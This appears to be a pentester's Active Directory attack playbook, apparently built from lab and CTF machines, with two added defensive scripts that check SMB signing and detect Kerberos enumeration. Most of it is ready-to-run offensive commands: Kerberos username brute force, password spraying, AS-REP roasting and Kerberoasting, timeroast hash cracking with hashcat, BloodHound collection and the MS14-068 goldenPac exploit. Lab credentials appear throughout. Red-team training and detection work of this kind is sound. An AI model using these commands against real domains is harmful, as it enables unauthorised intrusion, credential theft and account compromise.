Scanning

Database Setup

  • Setting up nxc workspace
nxcdb
workspace create <name_of_the_company>
workspace <name>
exit
  • Setting up msfconsole workspace
sudo msfdb init
sudo msfconsole
workspace -a <name_of_the_company>
workspace zephyr
db_nmap -sV -sS -sU -A -O -p- $CIDR
  • If ping is blocked use the following; it tends to take more time
db_nmap -sV -sS -sU -A -O -p- $CIDR -Pn
  • Once the setup is finished we can start enumerating the machines
nxc smb $CIDR | awk '/^SMB/ {print $2}' > smb_ips.txt
nxc ldap $CIDR | awk '/^LDAP/ {print $2}' > ldap_ips.txt
nxc mssql $CIDR | awk '/^MSSQL/ {print $2}' > mssql_ips.txt
nxc nfs $CIDR | awk '/^NFS/ {print $2}' > nfs_ips.txt
nxc ftp $CIDR -u anonymous -p anonymous
nxc ssh $IP/CIDR | awk '/^SSH/ {print $2}' > ssh_ips.txt
nxc winrm $IP/CIDR | awk '/^WINRM/ {print $2}' > winrm_ips.txt
  • If you get a STATUS_NOT_SUPPORTED error, NTLM authentication is not supported.
  • Configure krb5.conf and the hosts file, then use the -k flag in nxc (do it anyway).
nxc smb ip -u $USER -p $PASSWORD --generate-krb5-file ./krb5.conf
export KRB5_CONFIG=/path/to/krb5.conf

or

sudo cp ./krb5.conf /etc/krb5.conf
  • If you don't have krb5-user installed, use the following command
sudo apt install krb5-user
nxc smb ips.txt -u '' -p ''
cme smb ips.txt -u '' -p '' --shares
nxc smb DC-JPQ225 -u Rosie.Powell -p 'Cicada123' -d cicada.vl -k --shares
cme smb ips.txt -u 'guest' -p '' --shares
smbclient.py 'guest@10.10.76.112'
smbclient.py 'cicada.vl/rosie.powell@DC-JPQ225' -k

SMB signing

In a secure AD environment SMB signing must be required everywhere to prevent NTLM relay attacks.
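As an added defensive check (not part of these notes), the script below parses the host banner lines that nxc/cme smb prints and groups hosts per domain by whether signing is required (reported by the tool as signing:True) and whether SMBv1 is still enabled, giving a remediation list for the signing GPO. The banner lines are constructed to mirror the tool's format, not real scan output.

```python
import re

# Constructed sample of nxc/cme "smb" host banner lines (not real scan output).
# Format mirrored from the tool: proto, ip, port, hostname, then the OS banner with flags.
SAMPLE_NXC = """\
SMB  192.168.56.10  445  KINGSLANDING  [*] Windows Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB  192.168.56.11  445  WINTERFELL    [*] Windows Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB  192.168.56.22  445  CASTELBLACK   [*] Windows Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:True)
SMB  192.168.56.23  445  BRAAVOS       [*] Windows Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:False)
"""

# ip, hostname, domain, signing flag and (optional) SMBv1 flag from one banner line
HOST_RE = re.compile(
    r"^SMB\s+(\S+)\s+\d+\s+(\S+)\s+.*?\(domain:([^)]+)\)\s+\(signing:(True|False)\)"
    r"(?:\s+\(SMBv1:(True|False)\))?"
)

def parse_smb_banner(text):
    """Turn nxc smb banner lines into dicts; lines that are not host banners are skipped."""
    hosts = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, name, domain, signing, smbv1 = m.groups()
        hosts.append({"ip": ip, "name": name, "domain": domain,
                      "signing": signing == "True", "smbv1": smbv1 == "True"})
    return hosts

def signing_report(text):
    """Per domain: hosts where signing is required, hosts where it is not, hosts with SMBv1."""
    report = {}
    for h in parse_smb_banner(text):
        d = report.setdefault(h["domain"], {"signing_required": [],
                                            "signing_not_required": [], "smbv1": []})
        d["signing_required" if h["signing"] else "signing_not_required"].append(h["ip"])
        if h["smbv1"]:
            d["smbv1"].append(h["ip"])
    return report
```

Every IP under signing_not_required is a host where the "Microsoft network server: Digitally sign communications (always)" policy is not enforced and should be fixed before anything else.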

Enumerate DC ip

nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10

Poison and Relay

Do this at the start of your internal recon (see the Poison and Relay note).

Enumerate DC anonymously

Only possible when anonymous (null) sessions are allowed on the DC.

Enumerate users

cme smb $IP --users
cme ldap $IP --users
ldapsearch -x -H ldap://10.10.66.196 -b "DC=baby,DC=vl" "(objectClass=user)" sAMAccountName | grep "^sAMAccountName:" | awk '{print $2}' > users.txt

Do all the types of user enumeration; sometimes one tool misses something.

impacket-lookupsid anonymous@10.10.81.153

Enumerate user descriptions

nxc ldap 10.10.77.248 -u '' -p '' -M user-desc

Enumerate the password policy before brute forcing

cme smb $IP --pass-pol

Enumerate automatically with enum4linux

enum4linux 192.168.56.11

Enumerate manually

rpcclient -U "Domain(But anything works here)\\" 192.168.56.11 -N
net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'

List guest access on shares

cme smb $IP -u '' -p '' --shares
cme smb $IP -u 'a' -p '' --shares

NTLM theft when we have write access on a share

NTLM theft by uploading files on an SMB share

Enumerate DCs when anonymous sessions are not allowed

Create a user list

If anonymous login is not allowed on the DC, which is the case most of the time, we can enumerate users by brute force through Kerberos.

This way the bad password count is not incremented.

User Enum through Brute force

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='domain name (eg.sevenkingdoms.local)',userdb=got_users.txt" $IP
./kerbrute_linux_amd64 userenum --dc dc.office.htb -d office.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
cme smb 10.10.79.192 -u 'meow' -p '' --rid-brute
  • Discovers valid usernames by brute force querying likely usernames against a Kerberos service.

  • When an invalid username is requested the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, allowing us to determine that the user name was invalid.

  • Valid user names will elicit either a TGT in an AS-REP response or the error KRB5KDC_ERR_PREAUTH_REQUIRED, signaling that the user is required to perform pre-authentication.

  • This does not trigger Microsoft’s account lockout policy.

Users but No Credentials

AS-REP Roasting

impacket-GetNPUsers bruno.vl/svc_scan -no-pass -request
hashcat svc_scan_hash /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
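The Kerberos behaviour described above (unknown users answered with KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, no lockout counter touched; accounts without pre-authentication handed a TGT straight away) is exactly what a SOC can watch for in Windows Security event 4768. The script below is an added detection example, not part of these notes: it runs over constructed, flattened 4768 lines and flags a burst of unknown-principal errors from one source IP (user enumeration) and any TGT issued with PreAuthType=0 (an AS-REP roastable account being requested). Field names follow event 4768; the log lines themselves are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Event 4768 Status codes: 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (user does not exist), 0x0 = TGT issued.
UNKNOWN_PRINCIPAL, SUCCESS = "0x6", "0x0"
ENUM_THRESHOLD, ENUM_WINDOW = 5, timedelta(seconds=60)

# Constructed sample (not real telemetry): Windows Security event 4768 flattened to one line
# per event. 10.10.10.77 mimics kerbrute-style enumeration followed by a TGT request for an
# account with pre-authentication disabled (PreAuthType=0, RC4 etype 0x17 requested).
SAMPLE_4768 = """\
2024-05-01T10:00:00 TargetUserName=alice IpAddress=10.10.10.50 Status=0x0 PreAuthType=2 TicketEncryptionType=0x12
2024-05-01T10:00:01 TargetUserName=bob IpAddress=10.10.10.77 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
2024-05-01T10:00:01 TargetUserName=carol IpAddress=10.10.10.77 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
2024-05-01T10:00:02 TargetUserName=dave IpAddress=10.10.10.77 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
2024-05-01T10:00:02 TargetUserName=erin IpAddress=10.10.10.77 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
2024-05-01T10:00:03 TargetUserName=frank IpAddress=10.10.10.77 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
2024-05-01T10:00:04 TargetUserName=svc_scan IpAddress=10.10.10.77 Status=0x0 PreAuthType=0 TicketEncryptionType=0x17
2024-05-01T10:05:00 TargetUserName=typo_user IpAddress=10.10.10.51 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
"""

def parse_events(text):
    """Yield (timestamp, {field: value}) for each non-empty flattened 4768 line."""
    for line in text.splitlines():
        ts, _, rest = line.strip().partition(" ")
        if not rest:
            continue
        yield datetime.fromisoformat(ts), dict(kv.split("=", 1) for kv in rest.split())

def detect(text, threshold=ENUM_THRESHOLD, window=ENUM_WINDOW):
    """Return {'enum': {ip: hits}, 'asrep': [users]} from flattened 4768 events."""
    unknown = defaultdict(list)  # ip -> timestamps of unknown-principal errors
    asrep = []                   # TGTs issued without pre-auth (AS-REP roastable accounts)
    for ts, f in parse_events(text):
        if f["Status"] == UNKNOWN_PRINCIPAL:
            unknown[f["IpAddress"]].append(ts)
        elif f["Status"] == SUCCESS and f["PreAuthType"] == "0":
            asrep.append(f["TargetUserName"])
    enum = {}
    for ip, times in unknown.items():
        times.sort()
        for i, t0 in enumerate(times):  # sliding window over the error timestamps
            hits = sum(1 for t in times[i:] if t - t0 <= window)
            if hits >= threshold:
                enum[ip] = hits
                break
    return {"enum": enum, "asrep": asrep}
```

Failed 4768 events only exist if "Audit Kerberos Authentication Service" is enabled for failures on the DCs; the single typo_user error from 10.10.10.51 stays below the threshold and is not reported.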

Password Spraying if no password lockout policy

cme smb $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success

Enumerate DC with Creds

GetADUsers.py -all domain/username:password
ldapsearch -H ldap://$IP$ -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'

Use the above password spraying techniques to fish for users with bad passwords.

Time Roasting Attack

nxc smb 10.1.15.4 -M timeroast | grep -oP '\d+:\$sntp-ms\$[a-f0-9$]+' > timeroast_clean.txt
hashcat -m 31300 timeroast_clean.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt --username
  • Make a clean list of the hashes and crack it with hashcat.
  • Look up the first part of each hash (the RID) in BloodHound to find the associated computer account.

Having valid domain creds

Check ASREPROAST and KERBEROAST

cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --asreproast ASREPROAST

cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --kerberoasting KERBEROASTING
crackmapexec smb 10.10.254.37 -u samuel.davies -p l6fkiy9oN -M gpp_password

Kerberoasting

Clock Skew

  • In case you can't sync with ntpdate because you are in VirtualBox with the hardware clock set to UTC
sudo date -s "$(ntpdate -q $domaincontroller | grep -oP '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')"

Share enum with creds

cme smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares

Accessing the shares

smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.10'

BloodHound

From Kali
bloodhound.py --zip -c All -d $Domain$ -u user@domain -p password -dc dc.domain.local
cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --bloodhound -c all -ns 10.10.91.0

nxc ldap 10.10.11.5 -u mikasaAckerman -p 'IL0v3ErenY3ager'  --bloodhound -c All -d freelancer.htb --dns-server 10.10.11.5

bloodhound-python --zip -c All -d lustrous2.vl -u Thomas.myers@lustrous2.vl -dc lus2dc.lustrous2.vl --auth-method kerberos -ns 10.10.119.13 --use-ldaps
From Windows

.\sharphound.exe -d domain -c all --zipfilename any_name.zip
From Sliver C2

Execute it from the directory where the user has write access.

sharp-hound-4 -i -- "-c all"

Hunting with BloodHound
Show all domains and computers
MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p
Show all the users
MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p
Overall map of domains/groups/users
MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q
The users' ACLs
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p
Unconstrained Delegation
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2
Resources on BloodHound queries

SamAccountName (nopac)

SamAccountName (nopac) CVE-2021-42287

PrintNightmare

PrintNightmare

MS16-068

impacket-goldenPac $Domain/$User:$Password@10.1.15.100

Move back to Host Recon or AD Recon below

4. Host Recon

adtool and PBIS on Linux

https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap

Getting users with descriptions

./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n "COREWEBDL$" | grep "CN" | while read line; do echo "$line" && ./adtool --keytab=/etc/krb5.keytab -n 'COREWEBDL$@CORE.CYBER.LOCAL' -a lookup-object --dn="$line" --attr "description" && echo "======================"; done

AD Recon (Having Shell Access)

DACL

Manual Enumeration

Delegation

Delegation